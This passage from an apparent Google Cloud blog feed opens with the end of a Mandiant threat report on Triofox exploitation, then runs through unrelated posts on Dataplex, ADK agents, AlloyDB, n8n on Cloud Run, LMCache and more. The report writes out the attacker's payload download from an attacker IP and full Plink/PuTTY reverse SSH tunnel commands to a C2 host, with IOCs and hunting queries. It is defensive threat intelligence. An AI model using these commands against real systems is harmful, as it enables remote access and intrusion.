Download a payload from http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip, which hosted a disguised executable despite the ZIP extension
Save the payload to: C:WindowsappcompatSAgentInstaller_16.7.10368.56560.exe
Execute the payload silently

The executed payload was a legitimate copy of the Zoho Unified Endpoint Management System (UEMS) software installer. The attacker used the UEMS agent to then deploy the Zoho Assist and Anydesk remote access utilities on the host.

Reconnaissance and Privilege Escalation

The attacker used Zoho Assist to run various commands to enumerate active SMB sessions and specific local and domain user information.

Additionally, they attempted to change passwords for existing accounts and add the accounts to the local administrators and the “Domain Admins” group.

Defense Evasion

The attacker downloaded sihosts.exe and silcon.exe (sourced from the legitimate domain the.earth[.]li) into the directory C:windowstemp.

Filename	Original Filename	Description
sihosts.exe	Plink (PuTTY Link)	A common command-line utility for creating SSH connections
silcon.exe	PuTTY	A SSH and telnet client

These tools were used to set up an encrypted tunnel, connecting the compromised host to their command-and-control (C2 or C&C) server over port 433 via SSH. The C2 server could then forward all traffic over the tunnel to the compromised host on port 3389, allowing inbound RDP traffic. The commands were run with the following parameters:

C:windowstempsihosts.exe -batch -hostkey "ssh-rsa 2048 SHA256:<REDACTED>" -ssh -P 433 -l <REDACTED> -pw <REDACTED> -R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.]46

C:windowstempsilcon.exe  -ssh -P 433 -l <REDACTED> -pw <REDACTED>-R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.]46

Conclusion

While this vulnerability is patched in the Triofox version 16.7.10368.56560, Mandiant recommends upgrading to the latest release. In addition, Mandiant recommends auditing admin accounts, and verifying that Triofox’s Anti-virus Engine is not configured to execute unauthorized scripts or binaries. Security teams should also hunt for attacker tools using our hunting queries listed at the bottom of this post, and monitor for anomalous outbound SSH traffic.

Acknowledgements

Special thanks to Elvis Miezitis, Chris Pickett, Moritz Raabe, Angelo Del Rosario, and Lampros Noutsos

Detection Through Google SecOps

Google SecOps customers have access to these broad category rules and more under the Mandiant Windows Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:

Gladinet or Triofox IIS Worker Spawns CMD
Gladinet or Triofox Suspicious File or Directory Activity
Gladinet Cloudmonitor Launches Suspicious Child Process
Powershell Download and Execute
File Writes To AppCompat
Suspicious Renamed Anydesk Install
Suspicious Activity In Triofox Directory
Suspicious Execution From Appcompat
RDP Protocol Over SSH Reverse Tunnel Methodology
Plink EXE Tunneler
Net User Domain Enumeration

SecOps Hunting Queries

The following UDM queries can be used to identify potential compromises within your environment.

GladinetCloudMonitor.exe Spawns Windows Command Shell

Identify the legitimate GladinetCloudMonitor.exe process spawning a Windows Command Shell.

metadata.event_type = "PROCESS_LAUNCH"
principal.process.file.full_path = /GladinetCloudMonitor.exe/ nocase
target.process.file.full_path = /cmd.exe/ nocase

Utility Execution

Identify the execution of a renamed Plink executable (sihosts.exe) or a renamed PuTTy executable (silcon.exe) attempting to establish a reverse SSH tunnel.

metadata.event_type = "PROCESS_LAUNCH"
target.process.command_line = /-Rb/
(
target.process.file.full_path = /(silcon.exe|sihosts.exe)/ nocase or
(target.process.file.sha256 = "50479953865b30775056441b10fdcb984126ba4f98af4f64756902a807b453e7" and target.process.file.full_path != /plink.exe/ nocase) or
(target.process.file.sha256 = "16cbe40fb24ce2d422afddb5a90a5801ced32ef52c22c2fc77b25a90837f28ad" and target.process.file.full_path != /putty.exe/ nocase)
)

Indicators of Compromise (IOCs)

The following IOCs are available in a Google Threat Intelligence (GTI) collection for registered users.

Note: The following table contains artifacts that are renamed instances of legitimate tools.

Host-Based Artifacts

Artifact	Description	SHA-256 Hash
C:WindowsappcompatSAgentInstaller_16.7.10368.56560.exe	Installer containing Zoho UEMS Agent	`43c455274d41e58132be7f66139566a941190ceba46082eb2ad7a6a261bfd63f`
C:Windowstempsihosts.exe	Plink	`50479953865b30775056441b10fdcb984126ba4f98af4f64756902a807b453e7`
C:Windowstempsilcon.exe	PuTTy	`16cbe40fb24ce2d422afddb5a90a5801ced32ef52c22c2fc77b25a90837f28ad`
C:Windowstempfile.exe	AnyDesk	`ac7f226bdf1c6750afa6a03da2b483eee2ef02cd9c2d6af71ea7c6a9a4eace2f`
C:triofoxcentre_report.bat	Attacker batch script filename	N/A

Network-Based Artifacts

IP Address	ASN	Description
`85.239.63[.]37`	`AS62240 - Clouvider Limited`	IP address of the attacker used to initially exploit CVE-2025-12480 to create the admin account and gain access to the Triofox instance
`65.109.204[.]197`	`AS24950 - Hetzner Online GmbH`	After a dormant period, the threat actor used this IP address to login back into the Triofox instance and carry out subsequent activities
`84.200.80[.]252`	`AS214036 - Ultahost, Inc.`	IP address hosting the installer for the Zoho UEMSAgent remote access tool
`216.107.136[.]46`	`AS396356 - LATITUDE-SH`	Plink C2

Read More for the details.

2025 11 07

GCP – How Ericsson achieves data integrity and superior governance with Dataplex

Tibor Kiss Cloud, Google Cloud gcp

Data is the engine of modern telecommunications. For Ericsson’s Managed Services, which operates a global network of more than 710,000 sites, harnessing this data is not just an advantage, it’s essential for business growth and leadership. To power the future of its autonomous network operations and deliver on its strategic priorities, Ericsson has been on a transformative data journey with governance at the center of its strategy.

Ericsson moved from foundational practices to a sophisticated, business-enabling data governance framework using Google Cloud’s Dataplex Universal Catalog, turning data from a simple resource into a strategic asset.

From a new operating model to a new data mindset

Ericsson’s journey began in 2019 with the launch of the Ericsson Operations Engine (EOE), a groundbreaking, AI-powered operating model for managing complex, multi-vendor telecom networks. The EOE made one thing clear: to succeed, data had to be at the core of everything.

This realization led Ericsson to develop its first enterprise data strategy, which established the core principles for how data is collected, managed and governed. However, building a strategy is one thing — operationalizing it at scale is another.

To move beyond theory to address real-world challenges, Ericsson needed to:

Build trust: Provide discoverable, clean, reliable, and well-understood data to the teams deploying analytics, AI, and automation.
Balance defense and offense: Ensure compliance with contracts and regulations (defensive governance) while empowering teams to innovate and create value from data (offensive governance).
Ensure data integrity: Ericsson users see data integrity as the core principle for effective data management. Data quality, which is essential for reliable, trustworthy data throughout its lifecycle, is a key quality indicator (KQI) for measuring effectiveness. Any quality deviations must be managed like a high-priority incident with clear Service Level Agreements (SLA) for restoration and resolution.

To realize this vision, Ericsson sought a platform that could match its ambition for global-scale governance and innovation — and Dataplex Universal Catalog emerged as the ideal choice.

Ericsson made its selection based on four key criteria.

First, its capabilities aligned perfectly with Ericsson’s requirements for cloud-native transformation, business principles, and a long-term governance vision, underpinned by Ericsson’s strategic partnership with Google Cloud. Second, from a technical standpoint, Dataplex provided a tightly integrated, end-to-end ecosystem as a native Google Cloud solution, translating to faster time-to-market for use cases and reduced integration overhead.

Third, the platform offered a practical operating model that enabled quick learning, adaptation, and self-sufficiency, supporting an agile approach where Ericsson could fail fast and iterate. Finally, as an existing Google Cloud customer, Dataplex presented a clear and manageable Total Cost of Ownership (TCO), serving as a natural extension of Ericsson’s existing environment and providing a clear, manageable cost profile for both storage and compute extension with governance capabilities.

Putting governance into practice: Key capabilities in action

With Dataplex Universal Catalog as the governance foundation, Ericsson began implementing the core pillars of its governance program, moving from manual processes to an automated, intelligent data fabric.

More specifically, Ericsson established a unified business vocabulary within Dataplex. This transformative first step eliminated ambiguity and ensured their teams — from data scientists to data analysts — were speaking the same language. These glossaries also captured tribal knowledge and became the foundation for creating trusted data products.

In addition, Dataplex’s catalog is at the heart of the data governance solution, making data discovery simple and intuitive for authorized users. Ericsson uses its tagging capabilities to enrich the data assets with critical metadata, including data classification, ownership, retention policies, and sensitivity labels. Dataplex’s ability to automatically visualize data lineage, down to the column level, is another game-changer. Different data personas can instantly understand a dataset’s origin and its downstream impact, dramatically increasing trust and reducing investigation time. Furthermore, trustworthy AI models are built on high-quality data. For proactive data quality, Ericsson uses Dataplex to run automated quality checks and profiles on its data pipelines. When a quality rule is breached, an alert is automatically triggered, creating an incident in its service management platform to ensure data issues are treated with the urgency they deserve.

These capabilities are all underpinned by Ericsson’s Data Operating Model (DOM), a framework that defines the policies, people, processes, and technology needed to translate its data strategy into tangible value, comprising several facets when working with data.

Enterprise data architecture: Managing data flow, enterprise data modeling and best practices for data collection till consumption
Technology and tools: Business glossary, master, reference and metadata management, data modeling, and data quality management
Roles and responsibilities: Roles to manage and govern data (i.e., end-to-end data lifecycle and stewardship)
Data and model assurance: Data pipelines monitoring, data observability, and data quality monitoring
Governance: Manage data compliance, risk and security management, managing operational level agreement, objective and key results, and audit management
Processes: Data governance, data quality, data management, and data consent related processes

Looking ahead: The future is integrated and intelligent

As a global technology leader, Ericsson is committed to shaping the future of AI-powered data governance. Technology, especially in the AI space, is evolving at a breathtaking pace and both the data and AI governance practices must keep up.

These developments are guiding Ericsson’s future priorities, which include bridging the gap between data and AI governance, especially with the rise of generative and agentic AI. These plans include evaluating using generative AI capabilities in BigQuery and Dataplex to simplify governance and pursuing solutions that ensure transparency, explainability, fairness and manage risk in the deployment of AI models.

In addition to harnessing the power of AI for at-scale governance, Ericsson will also include usage of governance workflows, glossary-driven data quality policies, at-scale assignment of terms to assets, bulk import and export of glossaries, AI-powered glossary recommendations, and data quality re-usability functionalities. Ericsson is also aligning its architecture with data fabric and data mesh principles, empowering teams with self-service access to high-quality, trusted data products.Finally, Ericsson will be assessing the use of more granular, policy-based access controls to complement existing role-based access, further strengthening its data security, protection and privacy.

For any organization embarking on a similar path, Ericsson’s experience offers several key lessons:

Governance is a value enabler, not a blocker: A modern data governance program is focused on business enablement first, driving value and innovation, to complement policies, rules and risk management.
It’s a journey, not a destination: Be prepared to fail fast, learn, and adapt. The landscape is constantly changing at breakneck speed.
Focus on business outcomes, not tools: Technology is a critical enabler, but the conversation is about the business value you’re creating. Simplify the story, speak the language of the business, and unpack the hype.
Culture is everything: For governance to be effective, it’s the responsibility of everyone. This requires strong leadership, sponsorship, and a “data-first” mindset embedded throughout the organization.

By partnering with Google Cloud and tapping into the power of Dataplex Universal Catalog, Ericsson is building a data foundation that is not only compliant and secure but agile and intelligent — ready to power the next generation of autonomous networks.

Read More for the details.

2025 11 07

GCP – ADK architecture: When to use sub-agents versus agents as tools

Tibor Kiss Cloud, Google Cloud gcp

At its simplest, an agent is an application that reasons on how to best achieve a goal based on inputs and tools at its disposal.

As you build sophisticated multi-agent AI systems with the Agent Development Kit (ADK), a key architectural decision involves choosing between a sub-agent and an agent as a tool. This choice fundamentally impacts your system’s design, how well it scales, and its efficiency. Choosing the wrong pattern can lead to massive overhead — either by constantly passing full conversational history to a simple function or by under-utilizing the context-sharing capabilities of a more complex system.

While both sub-agents and tools help break down complex problems, they serve different purposes. The key difference is how they handle control and context.

Agents as tools: The specialist on call

An agent as a tool is a self-contained expert agent packaged for a specific, discrete task, like a specialized function call. The main agent calls the tool with a clear input and gets a direct output, operating like a transactional API. The main agent doesn’t need to worry about how the tool works; it only needs a reliable result. This pattern is ideal for independent and reusable tasks.

Key characteristics:

Encapsulated and reusable: The internal logic is hidden, making the tool easy to reuse across different agents.
Isolated context: The tool runs in its own session and cannot access the calling agent’s conversation history or state.
Stateless: The interaction is stateless. The tool receives all the information it needs in a single request.
Strict input/output: It operates based on a well-defined contract.

Sub-agents: The delegated team member

A sub-agent is a delegated team member that handles a complex, multi-step process. This is a hierarchical and collaborative relationship where the sub-agent works within the broader context of the parent agent’s mission. Use sub-agents for tasks that require a chain of reasoning or a series of interactions.

Key characteristics:

Tightly coupled and integrated: Sub-agents are part of a larger, defined workflow.
Shared context: They operate within the same session and can access the parent’s conversation history and state, allowing for more nuanced collaboration.
Stateful processes: They are ideal for managing processes where the task requires several steps to complete.
Hierarchical delegation: The parent agent explicitly delegates a high-level task and lets the sub-agent manage the process.

Here is a simple decision matrix that you can use to guide your architectural decision based on the task:

Criterion	Agent as a tool	Sub-agent	Decision
Task complexity	Low to Medium	High	Use a tool for atomic functions. Use a sub-agent for complex workflows.
Context & state	Isolated/None	Shared	If the task is stateless, use a tool. If it requires conversational context, use a sub-agent.
Reusability	High	Low to Medium	For generic, widely applicable capabilities, build a tool. For specialized roles in a specific process, use a sub-agent.
Autonomy & control	Low	High	Use a tool for a simple request-response. Use a sub-agent for delegating a whole sub-problem.

Use cases in action

Let’s apply this framework to some real-world scenarios.

Use case 1: The data agent (NL2SQL and visualization)

A business user asks for the top 5 product sales in Q2 by region and wants a bar chart.

Root Agent : Receives the business user’s request (NL), determines the necessary steps (SQL generation → Execution → Visualization), and delegates/sequences the tasks, before returning the response to the user.
NL2SQL Agent: Use a tool. The task is a single, reusable function: convert natural language to a SQL string, using metadata & schema for grounding.
Database Executor: Use a tool. This is a simple, deterministic function to execute the query and return data.
Data Visualization Agent: Use a sub-agent. The task is complex and multi-step. It involves analyzing the data returned by the database tool, and the original user query, selecting the right chart type, generating the visualization code, and executing it. Delegating this to a sub-agent allows the main orchestrator agent to maintain a high-level view while the sub-agent independently manages its complex internal workflow.

Use case 2: The sophisticated travel planner

A user asks to plan a 5-day anniversary trip to Paris, with specific preferences for flights, hotels, and activities. This is an ambiguous, high-level goal that requires continuous context and planning.

Travel planner: Use a root agent, to maintain the overall goal (“5-day anniversary trip to Paris”),manage the flow between sub-agents, and aggregate the final itinerary.

Note: You could implement a Context/Memory Manager Tool accessible to all agents, potentially using a simple key-value store (like Redis or a simple database) to delegate the storage of immutable decisions.

Flight search: Use a sub-agent. The task is not a simple search; involving multiple back-and-forth interactions with the user (e.g., “Is a layover in Dubai okay?”) while managing the overall trip context (dates, destination, class).
Hotel booking: Use a sub-agent. It needs to maintain state and context (dates, location preference, 5-star rating) as it searches for and presents options.
Itinerary generation: Use a sub-agent to generate a logical, day-by-day itinerary. The agent must combine confirmed flights/hotels with user interests (e.g., art museums, fine dining), potentially using its own booking tools.

Using tools is inefficient; each call requires the full trip context, leading to redundancy and state loss. Sub-agents are better for these stateful, collaborative processes as they share session context.

Get started

The decision between sub-agents and agents as tools is fundamental to designing an effective and scalable agentic system in ADK. As a guiding principle, remember:

Use tools for discrete, stateless, and reusable capabilities.
Use sub-agents to manage complex, stateful, and context-dependent processes.

By mastering this architectural pattern, you can design multi-agent systems that are modular and capable of solving complex, real-world problems.

Check out these examples on GitHub to start building using ADK.
Here is a fantastic blogpost that will help you build your first multi-agent workflow.

Read More for the details.

2025 11 07

GCP – AlloyDB accelerates AI with automated vector indexing and embedding

Tibor Kiss Cloud, Google Cloud gcp

Modern applications store their most valuable data such as product catalogs or user profiles in operational databases. These data stores are excellent for applications that need to handle real-time transactions — and with their support for vector operations, they’ve also become an excellent foundation for modern search or gen AI application serving.

AlloyDB AI provides powerful, high-performance vector capabilities enabling you to generate embeddings inline and manually tune powerful vector indexes. While you can generate embeddings out of the box for in line search use cases, we also wanted AlloyDB to address the complexity of creating and maintaining huge numbers of vector embeddings.

To make this possible, we’re introducing two new features for AlloyDB AI, available in preview, that will empower you to transform your existing operational database into a powerful, AI-native database with just a few lines of SQL:

Auto vector embeddings
Auto vector index

Auto vector embeddings transform operational data into vector search ready data by vectorizing data stored inside of AlloyDB at scale. The auto vector index self-configures vector indexes optimized for customer’s workloads, ensuring high quality and performance.

Compare this to the traditional approach of creating the vectors and loading them into your database. The basic steps are familiar to any AI developer: generate vector embeddings using specialized AI models, import the vectors into the database alongside the underlying text, and tune vector indexes. In other words, build an ETL (Extract, Transform, Load) pipeline, extract the data from your database, apply transformations, run it through the AI model, reload and reformat it, then reinsert it into your database and then tune the vector indexes. This approach not only involves significant engineering complexity but also introduces latency, making it difficult to keep your application in sync with your live data despite it being stored alongside it.

An additional challenge is to keep the vector index up to date, which is hard to do manually. While manually tuned indexes are performant and provide excellent results, they can be sensitive to updates in the underlying data and require performance and quality testing before they’re ready to hit the road.

Let’s walk through an example journey of an operational workload and see how AlloyDB AI’s new features remove friction from building enterprise-grade AI, and enable users to modernize applications from their database.

AlloyDB as a vector database

Imagine you run a large e-commerce platform with a products table in AlloyDB, containing structured data like product_id, color, price, and inventory_count, alongside unstructured data such as product_description.

You want to build a gen AI search feature to improve the quality of search in your application and make it more dynamic and personalized for users. You want to evolve from solely supporting simple lexical searches such as “jacket”, which perform exact matches, to searches such as “warm coat for winter” that can find semantically similar items like jackets, coats or vests. To refine the quality, you also want to combine this semantic matching with structured filters such as color = 'maroon' or price < 100. Some of these filters may even live in a different table, such as an orders table which stores information about the user’s order history.

aside_block: <ListValue: [StructValue([(‘title’, ‘Get started with a 30-day AlloyDB free trial instance’), (‘body’, <wagtail.rich_text.RichText object at 0x7f0420dea850>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

From operational to AI-native

Before you can get started on application logic, you need to generate embeddings on your data so you can perform a vector search. For this you would typically need to:

Build an ETL pipeline to extract products data from AlloyDB
Write custom code to batch the data and send it to an embedding model API on Vertex AI
Carefully manage rate limits, token limits, and failures
Write the resulting vectors back into your database
Build another process to watch for UPDATE commands so you can do it again and again, just to keep your data fresh

AlloyDB AI’s new feature, auto vector embeddings, eliminates this entire workflow.

It provides a fully managed, scalable solution to create and maintain embeddings directly from the database. The system batches API calls to Vertex AI, maximizing throughput, and can operate as a background process to ensure that your critical transactions aren’t blocked.

To generate vector embeddings from your product_description column, you just run one SQL command:

code_block: <ListValue: [StructValue([(‘code’, “CALL ai.initialize_embeddings(rn model_id => ‘gemini-embedding-001’,rn table_name => ‘products’,rn content_column => ‘product_description’,rn embedding_column => ‘product_embedding’,rn incremental_refresh_mode => ‘transactional’ — Automatically updates on data changesrn);”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f0420dea550>)])]>

Now AlloyDB can handle embedding generation for you. Your products table is AI-enabled and embeddings are automatically updated as your data changes.

If you prefer to manually refresh embeddings, you can run the following SQL command:

code_block: <ListValue: [StructValue([(‘code’, “CALL ai.refresh_embeddings(rn table_name => ‘products’,rn embedding_column => ‘product_embedding’, — embedding vector columnrn batch_size => 50 — optional overridern);”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f0420dea3d0>)])]>

Turbocharging search with AlloyDB AI

Now that you have embeddings, you face the second hurdle: performance and quality of search. Say a user searches for “warm winter coat.” Your query may look like this:

code_block: <ListValue: [StructValue([(‘code’, “SELECT * FROM productsrnWHERE color = ‘maroon’rnORDER BY product_embedding <-> google_ml.embedding(‘gemini-embedding-001’, ‘warm coat for winter’)rnLIMIT 10;”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f0420dea940>)])]>

To make this vector search query performant, you need a vector index. But traditional vector indexes require deep expertise: you have to manually configure parameters, rebuild the index periodically as data changes, and hope your tuning is correct. This complexity slows development and adds operational complexity.

code_block: <ListValue: [StructValue([(‘code’, ‘– Optimal `num_leaves` and `max_num_levels` are based on number of vectors in thern– products table, which means the user will have to figure that out beforehand torn– properly tune the index.rnrnCREATE INDEX idx_products_embedding ON productsrnUSING scann (product_embedding)rnWITH (num_leaves=100000, max_num_levels=2);’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f0420deaa00>)])]>

The new auto vector index feature abstracts all this away and delivers a fully automated and integrated vector search experience that is self-configuring, self-maintaining, and self-tuning. To create a fully optimized index, you just run:

code_block: <ListValue: [StructValue([(‘code’, “– AlloyDB will automatically figure out index configuration underneath the hood.rnCREATE INDEX idx_products_embedding ON productsrnUSING scann (product_embedding)rnWITH (mode = ‘AUTO’);”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f0420deaa90>)])]>

With mode=’AUTO’, AlloyDB handles everything:

Automatic configuration: It analyzes your data and automatically configures the index parameters at creation time to meet your performance and quality goals.
Automatic maintenance: The index updates incrementally and automatically as your data changes, ensuring it remains optimized without any manual intervention. It automatically splits as the index grows in size and automatically updates centroids when data distribution drifts.
Automatic query plan optimization: This is where the real magic happens. The ScaNN index leverages real-time workload statistics to self-tune and optimize te execution plan. For a deeper dive, read our previous blog, A deep dive into AlloyDB’s vector search enhancements.

Two new ways to become AI-native

With AlloyDB’s new capabilities, making your operational workload AI-native no longer requires complex ETL pipelines and infrastructure code.

Auto vector embeddings transforms your data by handling the entire embedding generation and management lifecycle inside the database.
Auto vector index simplifies retrieval by providing a self-tuning, self-maintaining index that automatically optimizes complex filtered vector searches.

By removing this complexity, AlloyDB empowers you to use your existing SQL skills to build and scale world-class AI experiences with speed and confidence, moving projects from proof-of-concept to production faster than ever before. Get started with auto vector embeddings and the auto vector index today.

To get started, try our 30-day AlloyDB free trial. New Google Cloud customers also get $300 in free credits.

Read More for the details.

2025 11 07

GCP – Easy AI workflow automation: Deploy n8n on Cloud Run

Tibor Kiss Cloud, Google Cloud gcp

n8n is a powerful yet easy-to-use workflow and automation tool for multi-step AI agents, and many teams want a simple, scalable, and cost-effective way to self-host it. With just a few commands, you can deploy n8n to Cloud Run and have it up and running, ready to supercharge your business with AI workflows that can manage spreadsheets, read and draft emails, and more. The n8n docs now tell you how to deploy the official n8n Docker image to our serverless platform, connect it to Cloud SQL for persistent data storage, call Gemini as the agents’ LLM, and (optionally) connect your workflows directly to Google Workspace.

Deploy n8n to Cloud Run in minutes

You can deploy the official n8n image directly to Cloud Run. This gives you a managed, serverless environment that automatically scales from zero to handle any workload, so you only pay for what you use. That means whenever you’re not actively using n8n, you’re not paying for any compute and your n8n data is persisted in Cloud SQL.

To first try out n8n quickly on Cloud Run, deploy it with this one command:

code_block: <ListValue: [StructValue([(‘code’, ‘gcloud run deploy –image=n8nio/n8n \rn –allow-unauthenticated \rn –port=5678 \rn –no-cpu-throttling \rn –memory=2Gi’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f0437df8af0>)])]>

This gives you a running instance of n8n that you can use to try out n8n and all its awesome features for workflow automation with the power of AI. Connect your first n8n agent to Gemini (provide your Gemini API key for the “Google Gemini Chat Model” credentials) and see it in action.

Then when you’re ready to use n8n for actual workflows, you can follow the steps in the n8n docs for a more durable, secure setup (using Cloud SQL, Secrets Manager, etc.). You can either use a Terraform script or follow along step-by-step through each gcloud command in the instructions.

Connect Google Workspace tools

A key benefit of hosting on Google Cloud is the ability to easily connect n8n to your Google Workspace tools. The n8n docs walk you through the steps to configure OAuth for Google Cloud, allowing your n8n workflows to securely access and automate tasks using Google tools like Gmail, Google Calendar, and Google Drive.

Here’s a demo showing an n8n instance on Cloud Run that uses Gmail and Google Calendar to schedule appointments on your behalf whenever an email hits your inbox with a request to meet:

The two AI agents in this n8n workflow call Gemini to do the following:

The Text Classifier reads your incoming emails to see which ones are asking for time to meet
The Agent checks your calendar for your availability, and sends a response with a suggested time

Cloud Run is great for all AI apps

Cloud Run is a versatile, easy-to-use runtime for all your AI application needs. Whether your agentic app was made with n8n, LangChain, ADK, or no framework at all, you can deploy it to Cloud Run. This collaboration on Cloud Run and n8n is another example of how we aim to simplify the process for developers to build and deploy intelligent applications.

Next steps

Read more about Cloud Run (or just try it out in the web console!)
Explore n8n

Read More for the details.

2025 11 07

GCP – Google Cloud Europe establishes new European Advisory Board

Tibor Kiss Cloud, Google Cloud gcp

Across the world, organizations are partnering with Google Cloud to tackle their toughest challenges, drive digital transformation, and unlock new levels of growth. In Europe, organizations face unique and complex regulatory challenges. To ensure we’re delivering the best possible value and experience for our customers here, we have established a new European Advisory Board. This distinguished group of leaders from across various industries will act as a vital feedback channel, help customers navigate complex regulatory landscapes, and foster a strong, sustainable digital economy. Their counsel is key to ensuring Google Cloud products not only meet but exceed European requirements, driving our regional expertise and differentiation and ultimately supporting Europe’s digital transformation.

The board comprises renowned leaders with deep expertise spanning technology, finance, retail, and public service.

The new board members are:

Jim Snabe (Chair): A global business leader and current Chairman of Siemens AG. With a long career at the intersection of technology and innovation, including his time as Co-CEO of SAP AG, Jim brings deep expertise in guiding multinational organizations through digital transformation and growth. His leadership will be pivotal in steering the board’s strategic direction.
Stefan F Heidenreich: A business leader with extensive experience in the consumer goods industry, including as Chairman of the Management Board and CEO of Beiersdorf AG. His knowledge of brand management, market strategy, and organizational leadership will provide valuable commercial insights.
Nigel Hinshelwood: An expert in financial services with significant leadership roles at institutions like HSBC and Lloyds Banking Group. His understanding of Europe’s financial sector and regulatory environment will be crucial for guiding Google Cloud’s work with major banking and financial services clients.
Christophe Cuvillier: A prominent French businessman and former CEO of Unibail-Rodamco-Westfield. With a background in luxury, retail, and real estate, Christophe’s perspective on customer-centricity and business transformation in the consumer sector will be a key asset to the board.
Tim Radford (from Jan 2026): A former British military leader and operational commander with a background in defense and large-scale project delivery. His insights into leveraging technology to achieve strategic business objectives will be vital to the board’s discussions.

“It is a privilege to chair Google Cloud’s EMEA advisory board,” said Jim Snabe. “Europe is at a critical juncture in its digital evolution. This board’s mission is to provide counsel that helps Google Cloud not only accelerate innovation but also ensure it is done in a way that aligns with Europe’s values and priorities, fostering a secure and inclusive digital future.”

The formation of this board underscores Google Cloud’s ongoing commitment to a European-first strategy, collaborating closely with local leaders to build technology solutions that are tailored to the continent’s unique needs and opportunities. The board will meet periodically to advise Google Cloud leadership on a range of strategic issues, from product development and market entry to policy and sustainability initiatives.

Read More for the details.

2025 11 07

GCP – Boosting LLM Performance with Tiered KV Cache on Google Kubernetes Engine

Tibor Kiss Cloud, Google Cloud gcp

Large Language Models (LLMs) are powerful, but their performance can be bottlenecked by the immense NVIDIA GPU memory footprint of the Key-Value (KV) Cache. This cache, crucial for speeding up LLM inference by storing Key (K) and Value (V) matrices, directly impacts context length, concurrency, and overall system throughput. Our primary goal is to maximize the KV Cache hit ratio by intelligently expanding NVIDIA GPU High Bandwidth Memory (HBM) with a tiered node-local storage solution.

Our collaboration with the LMCache team (Kuntai Du, Jiayi Yao, and Yihua Cheng from Tensormesh) has led to the development of an innovative solution on Google Kubernetes Engine (GKE).

Tiered Storage: Expanding the KV Cache Beyond HBM

LMCache extends the KV Cache from the NVIDIA GPU’s fast HBM (Tier 1) to larger, more cost-effective tiers like CPU RAM and local SSDs. This dramatically increases the total cache size, leading to a higher hit ratio and improved inference performance by keeping more data locally on the accelerator node. For GKE users, this means accommodating models with massive context windows while maintaining excellent performance.

Performance Benchmarking and Results

We designed tests to measure the performance of this tiered KV Cache by configuring workloads to fill each storage layer (HBM, CPU RAM, Local SSD). We benchmarked these configurations using various context lengths (1k, 5k, 10k, 50k, and 100k tokens), representing diverse use cases such as:

1k – 5k tokens: High-fidelity personas and complex instructions
10k tokens: Average user prompts (small RAG) or web page/article content
50k tokens: Prompt stuffing
100k tokens: Content equivalent to a long book

Our primary performance indicators were Time to First Token (TTFT), token input throughput, and end-to-end latency. The results highlight the best-performing storage setup for each KV Cache size and the performance improvements achieved.

Experiment Setup

We deployed a vLLM server on an A3 mega machine, leveraging local SSD for ephemeral storage via emptyDir.

Hardware: 8 × nvidia-h100-mega-80gb NVIDIA GPUs
Model: Llama-3.3-70B-Instruct
LMCache version: v0.3.3
Cache Configuration:

HBM only
HBM + CPU RAM
HBM + CPU RAM + Local SSD

Storage Resources: HBM: 640Gi, CPU RAM: 1Ti, Local SSD: 5Ti

Benchmark Tool: SGLang bench_serving

Requests: Tests were conducted with system prompt lengths of 1k, 5k, 10k, 50k, and 100k tokens. Each system prompt provided a shared context for a batch of 20 inference requests, with individual requests consisting of a unique 256-token input and generating a 512-token output.

Example Command:

code_block: <ListValue: [StructValue([(‘code’, “python3 sglang/bench_serving.py –host=${IP} –port=${PORT} –dataset-name=’generated-shared-prefix’ –model=$MODEL –tokenizer=$MODEL –backend=vllm –gsp-num-groups=80 –gsp-“), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7fb230d4a940>)])]>

Benchmark Results

Our tests explored different total KV Cache sizes. The following results highlight the optimal storage setup for each size and the performance improvements achieved:

Test 1: Cache (1.1M – 1.3M tokens) fits entirely within HBM

Results: In this scenario, adding slower storage tiers provided no advantage, making an HBM-only configuration the optimal setup.

Test 2: Cache (4.0M – 4.3M tokens) exceeds HBM capacity but fits within HBM + CPU RAM

System Prompt Length	Best-performing Storage Setup	Mean TTFT (ms) Change (%) vs. HBM only	Input Throughput Change (%) vs. HBM only	Mean End-to-End Latency Change (%) vs. HBM only
1000	HBM	0%	0%	0%
5000	HBM + CPU RAM	-18%	+16%	-14%
10000	HBM + CPU RAM	-44%	+50%	-33%
50000	HBM + CPU RAM + Local SSD	-68%	+179%	-64%
100000	HBM + CPU RAM + Local SSD	-79%	+264%	-73%

Test 3: Large cache (12.6M – 13.7M tokens) saturates HBM and CPU RAM, spilling to Local SSD

System Prompt Length	Best-performing Storage Setup	Mean TTFT (ms) Change (%) vs. HBM only	Input Throughput Change (%) vs. HBM only	Mean End-to-End Latency Change (%) vs. HBM only
1000	HBM + CPU RAM	+5%	+1%	-1%
5000	HBM + CPU RAM	-6%	+27%	-21%
10000	HBM + CPU RAM	+121%	+23%	-19%
50000	HBM + CPU RAM + Local SSD	+48%	+69%	-41%
100000	HBM + CPU RAM + Local SSD	-3%	+130%	-57%

Summary

These results clearly demonstrate that a tiered storage solution significantly improves LLM inference performance by leveraging node-local storage, especially in scenarios with long system prompts that generate large KV Caches.

Optimizing LLM inference is a complex challenge requiring the coordinated effort of multiple infrastructure components (storage, compute, networking). Our work is part of a broader initiative to enhance the entire end-to-end inference stack, from intelligent load balancing at the Inference Gateway to advanced caching logic within the model server.

We are actively exploring further enhancements by integrating additional remote storage solutions with LMCache.

Next Steps

Get started with the same setup mentioned above on GKE.
Keep up to date on the LLM-D Inference Stack.

Read More for the details.

2025 11 07

GCP – Agent Factory Recap: Build AI Apps in Minutes with Google’s Logan Kilpatrick

Tibor Kiss Cloud, Google Cloud gcp

In our latest episode of The Agent Factory, we were thrilled to welcome Logan Kilpatrick from Google Deep Mind for a vibe coding session that showcased the tools shaping the future of AI development. Logan, who has had a front-row seat to the generative AI revolution at both OpenAI and now Google, gave us a hands-on tour of the vibe coding experience in Google AI Studio, showing just how fast you can go from an idea to a fully-functional AI application.

